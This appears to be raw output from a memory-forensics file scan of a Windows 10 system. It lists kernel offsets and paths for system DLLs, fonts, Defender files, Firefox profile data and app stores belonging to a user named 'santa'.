+0x918b7711e3e0 \Windows\WinSxS\Catalogs 216 +0x918b7711e570 \Windows\System32\spp\store\2.0\cache\cache.dat 216 +0x918b7711e700 \Users\santa\Documents\desktop.ini 216 +0x918b7711e890 \Users\santa\AppData\Roaming\Microsoft\Windows\Recent\ms-gamingoverlay---.lnk 216 +0x918b7711ea20 \Program Files (x86)\Mozilla Firefox 216 +0x918b7711ebb0 \ProgramData\Microsoft\Windows Defender\Definition Updates\{945087C3-DEF1-474A-A297-2929D583B4F1}\mpengine.dll 216 +0x918b7711ed40 \Windows\Prefetch\BACKGROUNDTASKHOST.EXE-3283E2F7.pf 216 +0x918b7711f1f0 \Windows\System32\WinMetadata\Windows.System.winmd 216 +0x918b7711f380 \$Directory 216 +0x918b7711f510 \$Directory 216 +0x918b7711f830 \Windows\SystemResources\Chakra.dll.mun 216 +0x918b7711f9c0 \MsFteWds 216 +0x918b7711fb50 \Windows\System32 216 +0x918b7711fce0 \Windows\System32\WinMetadata\Windows.System.winmd 216 +0x918b7711fe70 \Windows\System32\POSyncServices.dll 216 +0x918b77120190 \Windows\System32\AppXApplicabilityBlob.dll 216 +0x918b77120320 \$Directory 216 +0x918b771204b0 \Windows\System32\en-US\twinapi.appcore.dll.mui 216 +0x918b77120640 \Windows\System32\en-US\windows.storage.dll.mui 216 +0x918b771207d0 \Windows\System32\BcastDVRClient.dll 216 +0x918b77120af0 \Windows\Fonts\georgiab.ttf 216 +0x918b77120e10 \Program Files (x86)\Mozilla Firefox\browser\features\webcompat@mozilla.org.xpi 216 +0x918b77121130 \Windows\WinSxS\Manifests 216 +0x918b77121450 \Users\santa\Desktop\desktop.ini 216 +0x918b771215e0 \Windows\System32\Windows.UI.AppDefaults.dll 216 +0x918b77121770 \ProgramData\Microsoft\Windows\ClipSVC\tokens.dat 216 +0x918b77121900 \CMNotify 216 +0x918b77121a90 \Windows\System32\en-US\dnsapi.dll.mui 216 +0x918b77121c20 \Windows\System32\en-US\winnlsres.dll.mui 216 +0x918b77121db0 \Users\santa\Videos\desktop.ini 216 +0x918b771220d0 \CMNotify 216 +0x918b77122260 \Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21740.0_x64__8wekyb3d8bbwe\Microsoft.Applications.Telemetry.Windows.dll 216 +0x918b771223f0 \Windows\System32\Windows.Devices.Sensors.dll 216 +0x918b77122580 \Users\santa\OneDrive\desktop.ini 216 +0x918b77122710 \Windows\System32\DefaultDeviceManager.dll 216 +0x918b771228a0 \Windows\System32\DDORes.dll 216 +0x918b77122a30 \ProgramData\Microsoft\Windows Defender\Platform\4.18.23100.2009-0\MpClient.dll 216 +0x918b77122bc0 \$Directory 216 +0x918b77122d50 \Program Files\WindowsApps\Microsoft.XboxGamingOverlay_6.123.10181.0_x64__8wekyb3d8bbwe\Assets\XboxFluentGB.ttf 216 +0x918b77122ee0 \Windows\Prefetch\TASKHOSTW.EXE-1EAF2222.pf 216 +0x918b77123200 \Windows\System32\en-US\KernelBase.dll.mui 216 +0x918b77123390 \Windows\WinSxS\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.18362.30_none_210ac8966535eaa7 216 +0x918b77123520 \Program Files (x86)\Mozilla Firefox\vcruntime140.dll 216 +0x918b771236b0 \Windows\System32\SecurityHealthService.exe 216 +0x918b77123840 \Windows\System32\Windows.Networking.BackgroundTransfer.dll 216 +0x918b771239d0 \Users\santa\Downloads\desktop.ini 216 +0x918b77123b60 \Program Files (x86)\Mozilla Firefox\msvcp140.dll 216 +0x918b77123cf0 \Windows\System32\en-US\windows.storage.dll.mui 216 +0x918b77123e80 \Users\santa\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\1b4dd67f29cb1962.automaticDestinations-ms 216 +0x918b771241a0 \Users\santa\Music\desktop.ini 216 +0x918b77124330 \$Directory 216 +0x918b77124650 \ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\E7CF176E110C211B 216 +0x918b77124970 \Windows\System32\en-US\mswsock.dll.mui 216 +0x918b77124b00 \Users\santa\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC\Microsoft\CryptnetUrlCache\MetaData\EAF8AA29A62AB29E614331747385D816_5566971F87EDB16B411A38E82A858AAE 216 +0x918b77124c90 \Users\santa\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 216 +0x918b77124e20 \$Directory 216 +0x918b77125140 \Windows\Fonts\arial.ttf 216 +0x918b771252d0 \Windows\System32\en-US\notepad.exe.mui 216 +0x918b77125460 \Windows\Fonts\StaticCache.dat 216 +0x918b771255f0 \$Directory 216 +0x918b77125780 \ProgramData\Microsoft\Windows Defender\Definition Updates\{945087C3-DEF1-474A-A297-2929D583B4F1}\mpasdlta.vdm 216 +0x918b77125aa0 \Windows\Fonts\arialbd.ttf 216 +0x918b77125c30 \Windows\Registration\R000000000006.clb 216 +0x918b77125dc0 \Program Files\WindowsApps\Microsoft.UI.Xaml.2.7_7.2208.15002.0_x64__8wekyb3d8bbwe\resources.pri 216 +0x918b771260e0 \Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f 216 +0x918b77126270 \Windows\System32\en-US\dnsapi.dll.mui 216 +0x918b77126400 \Program Files\WindowsApps\Microsoft.XboxGamingOverlay_6.123.10181.0_x64__8wekyb3d8bbwe\Assets\SegXbox2.ttf 216 +0x918b77126590 \Users\santa\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC\Microsoft\CryptnetUrlCache\Content\EAF8AA29A62AB29E614331747385D816_5566971F87EDB16B411A38E82A858AAE 216 +0x918b77126720 \Users\santa\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 216 +0x918b771268b0 \Program Files\WindowsApps\Microsoft.SkypeApp_15.108.3205.0_x64__kzf8qxf38zg5c\Skype\vcruntime140.dll 216 +0x918b77126bd0 \Windows\System32\en-US\taskhostw.exe.mui 216 +0x918b77126ef0 \$Directory 216 +0x918b77127080 \Windows\System32\en-US\KernelBase.dll.mui 216 +0x918b77127210 \Users\santa\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db 216 +0x918b771273a0 \Windows\SystemResources\notepad.exe.mun 216 +0x918b77127530 \CMApi 216 +0x918b77127850 \Program Files\WindowsApps\Microsoft.XboxGamingOverlay_6.123.10181.0_x64__8wekyb3d8bbwe\Assets\SegXboxGB.ttf 216 +0x918b771279e0 \Windows\System32\Unistore.dll 216 +0x918b77127b70 \Windows\WinSxS\Manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f.manifest 216 +0x918b77127d00 \Windows\System32\PimIndexMaintenance.dll 216 +0x918b77127e90 \Windows\System32\WinSync.dll 216 +0x918b771281b0 \Windows\SysWOW64\dllhost.exe 216 +0x918b77128340 \Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21740.0_x64__8wekyb3d8bbwe\HxOutlookBackground.dll 216 +0x918b771284d0 \$Directory 216 +0x918b77128660 \Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21740.0_x64__8wekyb3d8bbwe\HxComm.dll 216 +0x918b771287f0 \Windows\System32\en-US\KernelBase.dll.mui 216 +0x918b77128980 \ProgramData\Microsoft\Windows Defender\Definition Updates\{945087C3-DEF1-474A-A297-2929D583B4F1}\mpavdlta.vdm 216 +0x918b77128b10 \ProgramData\Packages\Microsoft.SkypeApp_kzf8qxf38zg5c\S-1-5-21-1046918562-1299961717-1331875240-1001\SystemAppData\Helium\UserClasses.dat 216 +0x918b77128ca0 \Windows\System32\en-US\netmsg.dll.mui 216 +0x918b77128e30 \Users\santa\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db 216 +0x918b77129150 \Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868 216 +0x918b77129470 \Windows\WinSxS\Manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f.manifest 216 +0x918b77129600 \Windows\System32\UserDataService.dll 216 +0x918b77129790 \Windows\System32\UserDataAccessRes.dll 216 +0x918b77129920 \Windows\System32\en-US\ESENT.dll.mui 216 +0x918b77129ab0 \Users\santa\AppData\Local\Comms\UnistoreDB\tmp.edb 216 +0x918b77129c40 \$Directory 216 +0x918b77129dd0 \Windows\System32\C_20127.NLS 216 +0x918b7712a0f0 \Windows\System32\WinSCard.dll 216 +0x918b7712a280 \$Directory 216 +0x918b7712a5a0 \Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll 216 +0x918b7712a730 \Windows\System32\MessagingDataModel2.dll 216 +0x918b7712a8c0 \Windows\System32\PimIndexMaintenanceClient.dll 216 +0x918b7712aa50 \Users\santa\AppData\Local\Microsoft\GameDVR\KnownGameList.biny_8wekyb3d8bbwe\LocalCache\KnownGameList.bin 216 +0x918b7712ad70 \Windows\WinSxS\Manifests\amd64_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.18362.30_en-us_b74ea25d7e44006c.manifest 216 +0x918b7712b220 \Windows\System32\en-US\rundll32.exe.mui 216 +0x918b7712b540 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsStore_12107.1001.15.0_x64__8wekyb3d8bbwe\ActivationStore.dat 216 +0x918b7712b860 \Endpoint 216 +0x918b7712b9f0 \Windows\System32\dmprocessxmlfiltered.dll 216 +0x918b7712bb80 \Windows\System32\mydocs.dll 216 +0x918b7712c1c0 \Windows\Prefetch\DLLHOST.EXE-2C56D458.pf 216 +0x918b7712c350 \Windows\System32\sppcext.dll 216 +0x918b7712c4e0 \Users\santa\AppData\Roaming\Microsoft\Windows\Libraries\Documents.library-ms 216 +0x918b7712c670 \Windows\WinSxS\Catalogs 216 +0x918b7712c800 \Windows\System32\rundll32.exe 216 +0x918b7712c990 \Endpoint 216 +0x918b7712cb20 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsStore_12107.1001.15.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 216 +0x918b7712ccb0 \Users\santa\AppData\Roaming\Microsoft\Windows\Libraries 216 +0x918b7712ce40 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsStore_12107.1001.15.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 216 +0x918b7712d160 \Program Files\WindowsApps\Microsoft.UI.Xaml.2.4_2.42007.9001.0_x64__8wekyb3d8bbwe\resources.pri 216 +0x918b7712d480 \Program Files\WindowsApps\Microsoft.WindowsStore_12107.1001.15.0_x64__8wekyb3d8bbwe\resources.pri 216 +0x918b7712d610 \Endpoint 216 +0x918b7712d7a0 \$Directory 216 +0x918b7712d930 \Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll 216 +0x918b7712dac0 \Program Files\WindowsApps\Microsoft.WindowsStore_12107.1001.15.0_x64__8wekyb3d8bbwe\WinStoreTasksWrapper.dll 216 +0x918b7712dc50 \ProgramData\Microsoft\Diagnosis\DownloadedSettings\telemetry.P-ARIA-194626ba46434f9ab441dd7ebda2aa64-5f64bebb-ac28-4cc7-bd52-570c8fe077c9-7717.json 216 +0x918b7712dde0 \Windows\System32\RuntimeBroker.exe 216 +0x918b7712e100 \Users\santa\AppData\Local\Mozilla\Firefox\Profiles\888jya8e.default-release\cache2\doomed\8084 216 +0x918b7712e420 \Windows\System32\icmp.dll 216 +0x918b7712e5b0 \$Directory 216 +0x918b7712e740 \Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\SiteSecurityServiceState.bin 216 +0x918b7712e8d0 \Windows\Fonts\arialbd.ttf 216 +0x918b7712ea60 \CMApi 216 +0x918b7712ed80 \Users\santa\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Settings\settings.dat 216 +0x918b7712f0a0 \gecko.4576.3988.3315572846900535200 216 +0x918b7712f230 \Program Files (x86)\Mozilla Firefox\firefox.exe 216 +0x918b7712f550 \Users\santa\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\Temp\mat-debug-6772.log 216 +0x918b7712f6e0 \Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\storage\default\https+++www.youtube.com\idb\1209553808LCo7g%sCD7a%t7adbca6s.sqlite 216 +0x918b7712f870 \Windows\WinSxS\Manifests\amd64_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.18362.30_en-us_b74ea25d7e44006c.manifest 216 +0x918b7712fa00 \Program Files (x86)\Mozilla Firefox 216 +0x918b7712fb90 \Users\santa\Videos\Captures\desktop.ini 216 +0x918b7712fd20 \Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\xulstore.json.tmp 216 +0x918b7712feb0 \Users\santa\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Settings\settings.dat.LOG1 216 +0x918b771301d0 \Users\santa\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Settings\settings.dat.LOG2 216 +0x918b771304f0 \color 216 +0x918b77130680 \CMNotify 216 +0x918b77130810 \Users\santa\AppData\Roaming\Microsoft\Windows\Recent\Pictures.lnk 216 +0x918b771309a0 \Users\santa\AppData\Local\Microsoft\Windows\Caches\cversions.1.db 216 +0x918b77130cc0 \Users\santa\AppData\Local\Mozilla\Firefox\Profiles\888jya8e.default-release\cache2\entries\4099E44A410522A31136010D97AEFFF69E14242D 216 +0x918b77130e50 \Windows\SysWOW64\imm32.dll 216 +0x918b77131170 \Users\santa\AppData\Local\Microsoft\EdgeUpdate\1.3.181.5\psuser.dll 216 +0x918b77131300 \Windows\SysWOW64\BitsProxy.dll 216 +0x918b77131490 \Users\santa\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1680_1050_POS4.jpg 216 +0x918b77131620 \Windows\System32\vm3ddevapi64.dll 216 +0x918b771317b0 \Windows\SysWOW64\mssprxy.dll 216 +0x918b77131940 \Users\santa\3D Objects\desktop.ini 216 +0x918b77131ad0 \MsFteWds 216 +0x918b77131c60 \$Directory 216 +0x918b77131df0 \Users\santa\AppData\Roaming\Microsoft\Windows\Libraries 216 +0x918b77132110 \Windows\System32 216 +0x918b771322a0 \Windows 216 +0x918b77132430 \Windows\SysWOW64\webio.dll 216 +0x918b771325c0 \CMApi 216 +0x918b77132750 \Windows\System32\RstrtMgr.dll 216 +0x918b771328e0 \wkssvc 216 +0x918b77132a70 \Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f 216 +0x918b77132d90 \Windows\System32\dlnashext.dll 216 +0x918b77133240 \Windows\SysWOW64\wldp.dll 216 +0x918b771333d0 \Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 216 +0x918b77133560 \Users\santa\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db 216 +0x918b771336f0 \Windows\Registration\R000000000006.clb 216 +0x918b77133880 \Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Crypto\TokenBindingKeys\Keys\887a471fc5377c5cbe6e38ac87d5a40f_65f5fb4f-5543-422b-b9c7-e8cc70c16fc6_775090f05efb4712c965fe90ed1ae5ce 216 +0x918b77133a10 \Windows\System32\vm3ddevapi64-release.dll 216 +0x918b77133ba0 \ProgramData\USOShared\Logs\NotificationUx.ceffb124-51f2-42a2-bc1d-50ec9d22051e.1.etl 216 +0x918b77133d30 \ProgramData\Microsoft\Diagnosis\DownloadedSettings\telemetry.P-ARIA-5476d0c4a7a347909c4b8a13078d4390-f8bdcecf-243f-40f8-b7c3-b9c44a57dead-7230.json 216 +0x918b771341e0 \Windows\System32\en-US\ieframe.dll.mui 216 +0x918b77134500 \Windows\System32\appraiser\Appraiser_Data.ini 216 +0x918b77134690 \ProgramData\Microsoft\Windows\AppRepository\Packages\microsoft.windowscommunicationsapps_16005.14326.21740.0_x64__8wekyb3d8bbwe\ActivationStore.dat 216 +0x918b771349b0 \Program Files (x86)\Mozilla Firefox 216 +0x918b77134b40 \Windows\Fonts\georgiai.ttf 216 +0x918b77134cd0 \ProgramData\USOShared\Logs\NotificationUx.f5a2effe-ee13-4166-9927-a4e70291e9c9.1.etl 216 +0x918b77134e60 \Windows\System32\dmclient.exe 216 +0x918b77135310 \Windows\System32 216 +0x918b771354a0 \Windows\Registration\R000000000006.clb 216 +0x918b77135630 \Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21740.0_x64__8wekyb3d8bbwe\office.odf 216 +0x918b771357c0 \Users\santa\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog.etl 216 +0x918b77135950 \Windows\System32\en-US\propsys.dll.mui 216 +0x918b77135ae0 \Users\santa\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\TempState\d5a8f02229be41efb047bd8f883ba799.db.ses 216 +0x918b77135c70 \Windows\Prefetch\RUNTIMEBROKER.EXE-B2EBF44B.pf 216 +0x918b77135e00 \ProgramData\Microsoft\Diagnosis\DownloadedSettings\telemetry.P-ARIA-af397ef28e484961ba48646a5d38cf54-77418283-d6f6-4a90-b0c8-37e0f5e7b087-7425.json 216 +0x918b77136120 \Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f 216 +0x918b77136440 \Windows\System32\en-US\windows.storage.dll.mui 216 +0x918b77136760 \Windows\System32\WinMetadata\Windows.System.winmd 216 +0x918b771368f0 \Program Files (x86)\Mozilla Firefox 216 +0x918b77136c10 \$Directory 216 +0x918b77136da0 \ProgramData\Microsoft\Windows\AppRepository\Packages\microsoft.windowscommunicationsapps_16005.14326.21740.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 216 +0x918b77137250 \ProgramData\Microsoft\Windows\AppRepository\Packages\microsoft.windowscommunicationsapps_16005.14326.21740.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 216 +0x918b771373e0 \Users\santa\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxStore.hxd 216 +0x918b77137570 \Windows\TextInput\WindowsInternal.ComposableShell.Experiences.TextInput.dll 216 +0x918b77137890 \Windows\System32\svchost.exe 216 +0x918b77137a20 \Sessions\1\AppContainerNamedObjects\S-1-15-2-3945102849-3632965805-3846928828-240845225-3300287824-62672950-817265009 216 +0x918b77137bb0 \Windows 216 +0x918b77137d40 \ProgramData\Microsoft\Windows\AppRepository\Packages\InputApp_1000.18362.1.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat 216 +0x918b77137ed0 \Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21740.0_x64__8wekyb3d8bbwe\en-us\hxcommintl.dll 216 +0x918b771381f0 \ProgramData\Microsoft\Windows Defender\Definition Updates\{D62DB865-2BF3-4866-A4B8-E44E0FC98F75}\mpengine.dll 216 +0x918b77138380 \Windows\rescache\_merged\2780983867\144070116.pri 216 +0x918b77138510 \ProgramData\Microsoft\Diagnosis\DownloadedSettings\telemetry.P-ARIA-d5a8f02229be41efb047bd8f883ba799-59258264-451c-4459-8c09-75d7d721219a-7112.json 216 +0x918b771386a0 \Windows\SystemResources\TextInput\TextInput.pri 216 +0x918b77138830 \ProgramData\Microsoft\Windows\AppRepository\Packages\InputApp_1000.18362.1.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 216 +0x918b771389c0 \ProgramData\Microsoft\Windows\AppRepository\Packages\InputApp_1000.18362.1.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 216 +0x918b77138b50 \$Directory 216 +0x918b77138ce0 \Windows\Fonts\segoeui.ttf 216 +0x918b77138e70 \ProgramData\Microsoft\Windows\AppRepository\Packages\InputApp_1000.18362.1.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat 216 +0x918b77139190 \Windows\SystemApps\InputApp_cw5n1h2txyewy\WindowsInternal.ComposableShell.Experiences.TextInput.InputApp.exe 216 +0x918b77139320 \Windows\SystemApps\InputApp_cw5n1h2txyewy\resources.pri 216 +0x918b771394b0 \Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\places.sqlite 216 +0x918b771397d0 \Windows\System32\en-US\windows.applicationmodel.datatransfer.dll.mui 216 +0x918b77139960 \Windows\SystemApps\InputApp_cw5n1h2txyewy 216 +0x918b77139af0 \Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\places.sqlite-wal 216 +0x918b77139c80 \Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\favicons.sqlite 216 +0x918b77139e10 \$Directory 216 +0x918b7713a130 \Windows\rescache\_merged\248604377\958443649.pri 216 +0x918b7713a2c0 \Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\favicons.sqlite-wal 216 +0x918b7713a450 \$Directory 216 +0x918b7713a5e0 \$Directory 216 +0x918b7713a770 \Users\santa\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat 216 +0x918b7713a900 \LOCAL\cubeb-pipe-4576-9 216 +0x918b7713aa90 \Users\santa\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.LOG2 216 +0x918b7713ac20 \Program Files (x86)\Mozilla Firefox\firefox.exe 216 +0x918b7713adb0 \Users\santa\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.LOG1 216 +0x918b7713b0d0 \Windows\DiagTrack\utc.allow.diffbase 216 +0x918b7713b260 \Windows\Prefetch\SVCHOST.EXE-EAE9B60B.pf 216 +0x918b7713b580 \Windows\System32\shutdownux.dll 216 +0x918b7713b710 \ProgramData\Microsoft\Diagnosis\DownloadedSettings\utc.cert.json 216 +0x918b7713b8a0 \Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\Flighting\FlightingLogging.txt 216 +0x918b7713c200 \Windows\System32\WinMetadata\Windows.UI.winmd 216 +0x918b7713c390 \Windows\TextInput\WindowsInternal.ComposableShell.Experiences.TextInput.LayoutData.dll 216 +0x918b7713c520 \1840.1da1a23c79ec4cf 216 +0x918b7713c6b0 \Windows\SysWOW64\edputil.dll 216 +0x918b7713c840 \Windows\System32\en-US\winnlsres.dll.mui 216 +0x918b7713c9d0 \ProgramData\Microsoft\Diagnosis\DownloadedSettings\utc.allow.json 216 +0x918b7713cb60 \Windows\System32\en-US\KernelBase.dll.mui 216 +0x918b7713ccf0 \Windows\System32\wdscore.dll 216 +0x918b7713d1a0 \Users\santa\AppData\Local\Packages\InputApp_cw5n1h2txyewy\Settings\settings.dat 216 +0x918b7713d330 \Users\santa\AppData\Local\Packages\InputApp_cw5n1h2txyewy\Settings\settings.dat.LOG1 216 +0x918b7713d4c0 \Users\santa\AppData\Local\Packages\InputApp_cw5n1h2txyewy\Settings\settings.dat.LOG2 216 +0x918b7713d7e0 \Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\AlternateServices.bin 216 +0x918b7713d970 \gecko.4576.3988.11800597154050836485 216 +0x918b7713de20 \Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\storage\default\https+++www.youtube.com\idb\4167130407yCt7G%cCf7C%o7ndfci6g.sqlite-shm 216 +0x918b7713e2d0 \CMApi 216 +0x918b7713e460 \gecko.4576.3988.1641067702936654701 216 +0x918b7713e5f0 \Windows\SysWOW64\rometadata.dll 216 +0x918b7713e780 \Windows\System32 216 +0x918b7713edc0 \gecko.4576.3988.1641067702936654701 216 +0x918b7713f0e0 \gecko.4576.3988.7552850740276905925 216 +0x918b7713f270 \gecko.4576.3988.7552850740276905925 216 +0x918b7713f590 \ProgramData\Microsoft\Windows\OneSettings\config.json 216 +0x918b7713f720 \Windows\System32\en-US\sppsvc.exe.mui 216 +0x918b7713f8b0 \Program Files (x86)\Mozilla Firefox\firefox.exe 216 +0x918b7713fd60 \Endpoint 216 +0x918b77140080 \Windows\Fonts\segoeuib.ttf 216 +0x918b77140530 \Windows\System32\wlidsvc.dll 216 +0x918b771406c0 \Windows\SysWOW64\schannel.dll 216 +0x918b771411b0 \Program Files (x86)\Mozilla Firefox 216 +0x918b77141340 \Program Files (x86)\Mozilla Firefox 216 +0x918b77141660 \Windows\SysWOW64\dpapi.dll 216 +0x918b771417f0 \$Directory 216 +0x918b77141980 \gecko.4576.3988.4692312835060683011 216 +0x918b77141b10 \Windows 216 +0x918b786bd1e0 \Windows\System32\en-US\winnlsres.dll.mui 216 +0x918b786bd370 \Windows\ImmersiveControlPanel 216 +0x918b786bd500 \Windows\System32 216 +0x918b786bd690 \Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f 216 +0x918b786bd820 \$Directory 216 +0x918b786bd9b0 \$Directory 216 +0x918b786bdb40 \Windows\SystemResources\notepad.exe.mun 216 +0x918b786bdcd0 \Windows\Fonts\StaticCache.dat 216 +0x918b786bde60 \Windows\System32\en-US\notepad.exe.mui 216 +0x918b786be180 \Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f 216 +0x918b786be4a0 \Windows\Registration\R000000000006.clb 216 +0x918b786be630 \$Directory 216 +0x918b786be7c0 \$Directory 216 +0x918b786be950 \LOCAL\cubeb-pipe-4576-1 216 +0x918b786beae0 \Windows\SysWOW64\directmanipulation.dll 216 +0x918b786bec70 \CMApi 216 +0x918b786bee00 \Windows\System32\en-US\svchost.exe.mui 216 +0x918b786bf120 \Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f 216 +0x918b786bf2b0 \Windows\rescache\_merged\2421516671\2126941428.pri 216 +0x918b786bf440 \Windows\Fonts\tahoma.ttf 216 +0x918b786bf5d0 \Windows\System32\en-US\ShutdownUX.dll.mui 216 +0x918b786bfc10 \LOCAL\cubeb-pipe-4576-1 216 +0x918b786c00c0 \Windows\Fonts\tahoma.ttf 216 +0x918b786c0570 \Dev\Query 216 +0x918b786c0700 \$Directory 216 +0x918b786c0890 \$Directory 216 +0x918b786c0a20 \ProgramData\Microsoft\Windows\AppRepository\Packages\windows.immersivecontrolpanel_10.0.2.1000_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 216 +0x918b786c0bb0 \$Directory 216 +0x918b786c0d40 \ProgramData\Microsoft\Windows\AppRepository\Packages\windows.immersivecontrolpanel_10.0.2.1000_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 216 +0x918b786c0ed0 \Endpoint 216 +0x918b786c11f0 \Windows\System32\Winlangdb.dll 216 +0x918b786c1380 \$Directory 216 +0x918b786c16a0 \Windows\ImmersiveControlPanel\SystemSettings.dll 216 +0x918b786c1830 \ProgramData\Microsoft\Windows\AppRepository\Packages\windows.immersivecontrolpanel_10.0.2.1000_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat 216 +0x918b786c19c0 \$Directory 216 +0x918b786c1b50 \Windows\SystemResources\Windows.UI.SettingsAppThreshold\pris\Windows.UI.SettingsAppThreshold.en-US.pri 216 +0x918b786c2190 \Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f 216 +0x918b786c2640 \Windows\Fonts\verdana.ttf 216 +0x918b786c2960 \ProgramData\Microsoft\Windows\AppRepository\StateRepository-Machine.srd 216 +0x918b786c2af0 \Program Files (x86)\Mozilla Firefox\browser\features\pictureinpicture@mozilla.org.xpi 216 +0x918b786c2c80 \Windows\ImmersiveControlPanel\en-US\SystemSettings.exe.mui 216 +0x918b786c2e10 \Windows\Fonts\trebucbi.ttf 216 +0x918b786c3130 \CMApi 216 +0x918b786c32c0 \Dev\Query 216 +0x918b786c3450 \Windows\System32\en-US\sechost.dll.mui 216 +0x918b786c3770 \Windows\System32 216 +0x918b786c3a90 \Windows\System32\en-US\KernelBase.dll.mui 216 +0x918b786c3c20 \Windows\System32\WinMetadata\Windows.UI.winmd 216 +0x918b786c3db0 \$Directory 216 +0x918b786c4580 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ContentDeliveryManager_10.0.18362.1_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat 216 +0x918b786c4710 \Windows\System32\en-US\crypt32.dll.mui 216 +0x918b786c48a0 \Windows\System32\RuntimeBroker.exe 216 +0x918b786c4bc0 \Endpoint 216 +0x918b786c59d0 \Windows\System32\en-US\propsys.dll.mui 216 +0x918b786c5b60 \ProgramData\Microsoft\Windows Defender\Platform\4.18.23100.2009-0\MpCmdRun.exe 216 +0x918b786c5e80 \Windows\System32\en-US\mswsock.dll.mui 216 +0x918b786c6330 \Windows\System32\en-US\combase.dll.mui 216 +0x918b786c6650 \Windows\System32 216 +0x918b786c6970 \Windows\SysWOW64\rmclient.dll 216 +0x918b786c6b00 \Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f 216 